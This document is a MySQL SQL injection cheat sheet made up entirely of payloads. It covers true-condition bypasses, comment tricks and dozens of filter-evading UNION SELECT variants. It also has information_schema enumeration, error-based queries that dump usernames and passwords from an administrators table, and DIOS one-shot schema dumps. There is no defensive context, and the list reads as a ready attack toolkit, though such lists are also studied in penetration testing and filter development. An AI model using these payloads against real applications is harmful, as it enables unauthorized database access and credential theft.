- [~] Check Error [~]
- 01. '
- 02. "
- 03. or 1=1
- 04. and 1=1
- 05. and false
- 06. and true
- • [Single quotes]
- 01. ' or '1'='1
- 02. ' and '1'='1
- 03. ' and false
- 04. ' and true
- • [Double quotes]
- 01. " or "1"="1
- 02. " and "1"="1
- 03. " and false
- 04. " and true
- [~] Bypass True Condition [~]
- or '1
- || '1
- null' || 'a'=_binary'a
- 1' || 'a'=x'61
- 1' && '0'=x'30
- 1' %26%26 %270%27%3dx'30
- 2' && 0.e1=_binary"0
- 1 or 1.e1=0b1010
- ' || 1 like 1
- '-'
- "-"
- ' || 2 not like 1
- 110 or x'30'=48
- '1'!=20
- 1 or 20!='1'
- 2 and 2>0
- 3 || 0<1
- 12 || 0b1010<0b1011
- 0b11 || 0b1010x'30'
- 1 or 0b1
- 2121/**/||21
- 111' or _binary'1
- 1 or 2121
- 1' or 12 rlike '1
- [~] Comments [~]
- 01. -- : MySQL Linux Style
- 02. --+ : MySQL Windows Style
- 03. # : Hash (URL-encode when used)
- 04. --+- : SQL Comment
- 05. ;%00 : Null Byte
- 07. ` : Backtick
- 08. -- -
- 09. /*
- 10. /**/
- 11. %23
- 12. //
- [~] order by [~]
- 01. group by -- +
- 02. and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
- 03. Procedure Analyse()--+
- 04. and (select * from news)=(select 0)--+
- 05. /**/ORDER/**/BY/**/
- 06. /*!order*/+/*!by*/
- 07. /*!ORDER BY*/
- 08. /*!50000ORDER BY*/
- 09. /*!50000ORDER*//**//*!50000BY*/
- 10. /*!12345ORDER*/+/*!BY*/
- [~] UNION select [~]
- 01. (uNioN)+(sElECt)….
- 02. (uNioN+SeleCT)+…
- 03. (UnI)(oN)+(SeL)(ecT)+….
- 04. union (select 1,2,3,4…)
- 05. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
- 06. %55nion(%53elect 1,2,3)-- -
- 07. +union+distinct+select+
- 08. +union+distinctROW+select+
- 09. /**//*!12345UNION SELECT*//**/
- 10. /**//*!50000UNION SELECT*//**/
- 11. /**/UNION/**//*!50000SELECT*//**/
- 12. /*!50000UniON SeLeCt*/
- 13. union /*!50000%53elect*/
- 14. +#uNiOn+#sEleCt
- 15. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- 16. /*!%55NiOn*/ /*!%53eLEct*/
- 17. /*!u%6eion*/ /*!se%6cect*/
- 18. +un/**/ion+se/**/lect
- 19. uni%0bon+se%0blect
- 20. %2f**%2funion%2f**%2fselect
- 21. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- 22. REVERSE(noinu)+REVERSE(tceles)
- 24. /*--*/union/*--*/select/*--*/
- 25. union (/*!/**/ SeleCT */ 1,2,3)
- 26. /*!union*/+/*!select*/
- 27. union+/*!select*/
- 28. /**/union/**/select/**/
- 29. /**/uNIon/**/sEleCt/**/
- 30. +%2F**/+Union/*!select*/
- 31. /**//*!union*//**//*!select*//**/
- 32. /*!uNIOn*/ /*!SelECt*/
- 33. +union+distinct+select+
- 34. +union+distinctROW+select+
- 35. uNiOn aLl sElEcT
- 36. UNIunionON+SELselectECT
- /**/union/*!50000select*//**/
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- %55nion/**/%53elect
- uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*--*//*!all*//*--*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- union+sel%0bect
- +uni*on+sel*ect+
- +#1q%0Aunion all#qa%0A#%0Aselect
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- %23xyz%0AUnIOn%23xyz%0ASeLecT+
- %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
- union(select(1),2,3)
- union (select 1111,2222,3333)
- uNioN (/*!/**/ SeleCT */ 11)
- union (select 1111,2222,3333)
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
- %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
- +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
- /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
- /union\sselect/g
- /union\s+select/i
- /*!UnIoN*/SeLeCT
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +uni>on+sel>ect+
- +(UnIoN)+(SelECT)+
- +(UnI)(oN)+(SeL)(EcT)
- +’UnI”On’+'SeL”ECT’
- +uni on+sel ect+
- +/*!UnIoN*/+/*!SeLeCt*/+
- /*!u%6eion*/ /*!se%6cect*/
- uni%20union%20/*!select*/%20
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /^.*union.*$/ /^.*select.*$/
- /*union*/union/*select*/select+
- /*uni X on*/union/*sel X ect*/
- +un/**/ion+sel/**/ect+
- +UnIOn%0d%0aSeleCt%0d%0a
- UNION/*&test=1*/SELECT/*&pwn=2*/
- un?<ion sel="">+un/**/ion+se/**/lect+
- +UNunionION+SEselectLECT+
- +uni%0bon+se%0blect+
- %252f%252a*/union%252f%252a /select%252f%252a*/
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f**%2funion%2f**%2fselect%2f**%2f
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- /*!UnIoN*/SeLecT+
- [~] information_schema.tables [~]
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
- /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
- /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
- [~] concat() [~]
- CoNcAt()
- concat()
- CON%08CAT()
- CoNcAt()
- %0AcOnCat()
- /**//*!12345cOnCat*/
- /*!50000cOnCat*/(/*!*/)
- unhex(hex(concat(table_name)))
- unhex(hex(/*!12345concat*/(table_name)))
- unhex(hex(/*!50000concat*/(table_name)))
- [~] group_concat() [~]
- /*!group_concat*/()
- gRoUp_cOnCAt()
- group_concat(/*!*/)
- group_concat(/*!12345table_name*/)
- group_concat(/*!50000table_name*/)
- /*!group_concat*/(/*!12345table_name*/)
- /*!group_concat*/(/*!50000table_name*/)
- /*!12345group_concat*/(/*!12345table_name*/)
- /*!50000group_concat*/(/*!50000table_name*/)
- /*!GrOuP_ConCaT*/()
- /*!12345GroUP_ConCat*/()
- /*!50000gRouP_cOnCaT*/()
- /*!50000Gr%6fuP_c%6fnCAT*/()
- unhex(hex(group_concat(table_name)))
- unhex(hex(/*!group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(table_name)))
- unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
- unhex(hex(/*!50000group_concat*/(table_name)))
- unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
- unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
- convert(group_concat(table_name)+using+ascii)
- convert(group_concat(/*!table_name*/)+using+ascii)
- convert(group_concat(/*!12345table_name*/)+using+ascii)
- convert(group_concat(/*!50000table_name*/)+using+ascii)
- CONVERT(group_concat(table_name)+USING+latin1)
- CONVERT(group_concat(table_name)+USING+latin2)
- CONVERT(group_concat(table_name)+USING+latin3)
- CONVERT(group_concat(table_name)+USING+latin4)
- CONVERT(group_concat(table_name)+USING+latin5)
- [~] Error based [~]
- • Check version
- = and (select * from (select name_const(version(),1),name_const(version(),1))a)
- • Check user
- = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- • Check database
- = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- • Check Table
- = and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- • Check Column
- = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- • Dump data
- = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- [~] Using Xpath [~]
- 01. and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))--
- [~]DIOS[~]
- 01. (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
- 02. (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
- 03. (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
- 04. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
- 05. (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,export_set(5,@,table_schema,0x3c6c693e,2),table_name,0xa3a,2),column_name,0xa3a,2)),@,2))